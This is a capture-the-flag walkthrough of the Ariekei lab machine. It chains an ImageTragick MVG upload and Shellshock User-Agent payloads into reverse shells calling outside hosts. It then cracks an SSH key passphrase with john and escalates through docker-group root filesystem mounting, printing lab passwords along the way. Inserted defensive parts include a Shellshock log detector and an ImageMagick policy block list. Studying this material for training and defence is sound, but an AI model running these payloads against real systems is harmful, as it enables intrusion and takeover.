Basic information

Port scan

Two SSH ports and one 443:

$ nmap -sC -sV 10.10.10.65

Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-01 14:17 CST
Nmap scan report for 10.10.10.65
Host is up (0.068s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a7:5b:ae:65:93:ce:fb:dd:f9:6a:7f:de:50:67:f6:ec (RSA)
| 256 64:2c:a6:5e:96:ca:fb:10:05:82:36:ba:f0:c9:92:ef (ECDSA)
|_ 256 51:9f:87:64:be:99:35:2a:80:a6:a2:25:eb:e0:95:9f (ED25519)
443/tcp open ssl/http nginx 1.10.2
|_http-server-header: nginx/1.10.2
|_http-title: Site Maintenance
| ssl-cert: Subject: stateOrProvinceName=Texas/countryName=US
| Subject Alternative Name: DNS:calvin.ariekei.htb, DNS:beehive.ariekei.htb
| Not valid before: 2017-09-24T01:37:05
|_Not valid after: 2045-02-08T01:37:05
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
| tls-nextprotoneg:
|_ http/1.1
1022/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 98:33:f6:b6:4c:18:f5:80:66:85:47:0c:f6:b7:90:7e (DSA)
| 2048 78:40:0d:1c:79:a1:45:d4:28:75:35:36:ed:42:4f:2d (RSA)
| 256 45:a6:71:96:df:62:b5:54:66:6b:91:7b:74:6a:db:b7 (ECDSA)
|_ 256 ad:8d:4d:69:8e:7a:fd:d8:cd:6e:c1:4f:6f:81:b4:1f (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.95 seconds

443

Visiting it directly shows a site under development:

The certificate lists two domain names; add them to hosts:

10.10.10.65 calvin.ariekei.htb beehive.ariekei.htb

Visiting each: one returns 404, the other shows the site under development:

Directory scan

gobuster dir -u https://beehive.ariekei.htb/ -k  -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 50
/blog (Status: 301) [Size: 325] [--> http://beehive.ariekei.htb/blog/]
/cgi-bin/ (Status: 403) [Size: 295]
/index.html (Status: 200) [Size: 487]

gobuster dir -u https://beehive.ariekei.htb/cgi-bin/ -k -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,cgi,html,txt -t 50
/stats (Status: 200) [Size: 1223]

gobuster dir -u https://calvin.ariekei.htb/ -k -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 50
/upload (Status: 200) [Size: 1656]

blog

stats

Requesting it returns some system information, including bash 4.2.37:

upload

A file upload form; a normal upload produces no visible response. The page title is "Image Converter", so it presumably performs image conversion:

shellshock

bash 4.2.37 may be vulnerable to Shellshock, but the test only returns an emoticon:

curl -k -H "User-Agent: () { :; }; /bin/miao" https://beehive.ariekei.htb/cgi-bin/stats
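A defender-side check for the probe above, added here as an example and not part of the original writeup: it scans nginx combined-format access log lines for the Shellshock function-definition prefix in the User-Agent or Referer field and reports the status code, so a 403 shows the WAF stopped it while a 2xx against a CGI path is the case worth investigating. The log lines are constructed samples, not from the target.

```python
import re

# Shellshock probes put a bash function definition "() {" at the start of a header
# value; matching that prefix (with loose whitespace) catches the common variants.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# nginx "combined" log format; the User-Agent is the last quoted field.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \d+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def scan_line(line):
    """Return (ip, path, status, field, value) for a Shellshock-looking line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    for field in ("ua", "referer"):
        value = m.group(field)
        if SHELLSHOCK_RE.search(value):
            return (m.group("ip"), m.group("path"), int(m.group("status")), field, value)
    return None


def scan_log(lines):
    """All Shellshock hits in the given log lines, in order."""
    return [hit for hit in (scan_line(l) for l in lines) if hit]


def unblocked_cgi_hits(lines):
    """Hits that reached a /cgi-bin/ script with a success status, i.e. not stopped by a WAF."""
    return [h for h in scan_log(lines) if h[1].startswith("/cgi-bin/") and 200 <= h[2] < 300]


# Constructed sample lines (not from the target); IPs are from the documentation ranges.
SAMPLE_LOG = [
    '198.51.100.23 - - [01/Jun/2021:14:19:55 +0800] "GET /blog/ HTTP/1.1" 200 4182 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64) Firefox/89.0"',
    '203.0.113.7 - - [01/Jun/2021:14:20:01 +0800] "GET /cgi-bin/stats HTTP/1.1" 403 295 "-" '
    '"() { :; }; /bin/miao"',
    '203.0.113.7 - - [01/Jun/2021:14:21:40 +0800] "GET /cgi-bin/stats HTTP/1.1" 200 1223 "-" '
    '"() {:;}; /bin/miao"',
]

if __name__ == "__main__":
    for ip, path, status, field, value in scan_log(SAMPLE_LOG):
        print(f"{ip} {path} {status} {field}={value!r}")
```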

ImageTragick

Image conversion is usually done with ImageMagick, and a search turns up this vulnerability.

Upload a malicious file directly; the code executes during conversion and yields a reverse shell inside a Docker container:

shell.mvg

push graphic-context
viewbox 0 0 640 480
fill 'url(https://"|setsid /bin/bash -i >/dev/tcp/10.10.14.14/443 0<&1 2>&1")'ms
pop graphic-context
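The server-side mitigation for this class of bug, added here as an example and not part of the original writeup: ImageMagick's policy.xml (typically /etc/ImageMagick-6/policy.xml on Debian-based systems) can deny the coders ImageTragick abuses, including the MVG format and the URL/HTTPS fetching the file above relies on. With these entries the converter refuses such input instead of executing it.

```xml
<policymap>
  <!-- Coders that ImageTragick-style payloads use; deny all rights to each. -->
  <policy domain="coder" rights="none" pattern="EPHEMERAL" />
  <policy domain="coder" rights="none" pattern="URL" />
  <policy domain="coder" rights="none" pattern="HTTPS" />
  <policy domain="coder" rights="none" pattern="MVG" />
  <policy domain="coder" rights="none" pattern="MSL" />
  <policy domain="coder" rights="none" pattern="TEXT" />
  <policy domain="coder" rights="none" pattern="SHOW" />
  <policy domain="coder" rights="none" pattern="WIN" />
  <policy domain="coder" rights="none" pattern="PLT" />
</policymap>
```

Verifying the upload's magic bytes before handing it to ImageMagick is a second, independent control, since the MVG file above is plain text regardless of its extension.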

Information

Enumerating inside the container reveals bastion-related files; port 1022 belongs to it:

mount -l
/dev/mapper/ariekei--vg-root on /app type ext4 (rw,relatime,errors=remount-ro,data=ordered)
/dev/mapper/ariekei--vg-root on /common type ext4 (ro,relatime,errors=remount-ro,data=ordered)

[root@calvin .secrets]# pwd
pwd
/common/.secrets
[root@calvin .secrets]# ls -al
ls -al
total 16
drwxrwxr-x 2 root root 4096 Sep 24 2017 .
drwxr-xr-x 5 root root 4096 Sep 23 2017 ..
-r--r----- 1 root root 1679 Sep 23 2017 bastion_key
-r--r----- 1 root root 393 Sep 23 2017 bastion_key.pub

[root@calvin bastion-live]# pwd
pwd
/common/containers/bastion-live
[root@calvin bastion-live]# ls
ls
Dockerfile
build.sh
sshd_config
start.sh
cat Dockerfile
FROM rastasheep/ubuntu-sshd
RUN echo "root:Ib3!kTEvYw6*P7s" | chpasswd
RUN mkdir -p /root/.ssh
RUN echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDwzZ8tXRyG6en6U8d4r/oL/fpx2Aw+V22u8dJjNnSP9jly+RFJk8Z+aKMFTIYJ+orjyMxieqMtyYdVOUDvCanMnChmPbIWqw6UzdV+nnBrWTE/4keDSRn8ijs10tPPiBDDDpqQf21XiiyUfD0RkAl3gJk6hw7wHfWEilR1KWflbNAlau+lfM9YOFLbYrFmpKnZivqkDtuEPfnIVDurS2CiDC+oS+fnP2nGcIMec95iiPpJ4MhPvbdlb+UCxV6FoNtehT9ciZukD0xIXakwAwGlPlFQbzQqqEjEh5ltvnaJG6QzPfLnB6Uis8ku0NNDitreBm2Ba9sJ8NpXh46Ighhh root@arieka" > /root/.ssh/authorized_keys
[root@calvin bastion-live]# cat build.sh
cat build.sh
#!/bin/bash
[root@calvin bastion-live]# cat start.sh
cat start.sh
docker run \
-v /dev/null:/root/.sh_history \
-v /dev/null:/root/.bash_history \
--restart on-failure:5 \
--net arieka-live-net --ip 172.23.0.253 \
-h ezra.ariekei.htb --name bastion-live -dit \
-v /opt/docker:/common:ro \
-v $(pwd)/sshd_config:/etc/ssh/sshd_config:ro \
-p 1022:22 bastion-template

docker network connect --ip 172.24.0.253 arieka-test-net bastion-live

bastion

With the information obtained, we can log in to the bastion Docker container:

Information

This one also has the common/containers folder. Inspecting the configs there reveals the WAF, which is why the earlier request to 443 only returned an emoticon; the nginx config also shows that beehive.ariekei.htb is blog-test:

root@ezra:/common/containers/waf-live# pwd
/common/containers/waf-live
root@ezra:/common/containers/waf-live# cat modsecurity.conf
root@ezra:/common/containers/waf-live# cat nginx.conf

shellshock

Now Shellshock can be exploited from inside the network, unaffected by the WAF:

root@ezra:~# python 34900.py payload=reverse rhost=172.24.0.2 lhost=172.24.0.253 lport=1234 pages=/cgi-bin/stats

blog

Now we have www-data on blog. The files seen earlier contained the root password, so we can forward a port for convenience, fire the reverse shell, upgrade the TTY, and switch to root:

root:Ib3!kTEvYw6*P7s

ssh -i bastion_key root@10.10.10.65 -p 1022 -L 8443:172.24.0.2:80

# use the absolute path /bin/bash
curl -H "User-Agent: () { :; }; echo ; echo ; /bin/bash -c 'bash -i >& /dev/tcp/172.24.0.253/1234 0>&1'" http://127.0.0.1:8443/cgi-bin/stats

python -c 'import pty; pty.spawn("/bin/bash")'

user flag

user.txt is in the user's home directory in the blog container:

spanishdancer

The .ssh directory in the blog user's home contains an encrypted private key; crack its passphrase:

python /usr/share/john/ssh2john.py temp_rsa > hash.txt
sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

purple1 (temp_rsa)

Use this private key and passphrase to log in to the host as spanishdancer:

Privilege escalation information

The current user is in the docker group:

spanishdancer@ariekei:~$ id
uid=1000(spanishdancer) gid=1000(spanishdancer) groups=1000(spanishdancer),999(docker)

Privilege escalation &amp; root flag

Simply mount the root filesystem and read it, or mount it, change the permissions, and read it from outside:

docker run -v /:/rootfs -i -t bash

References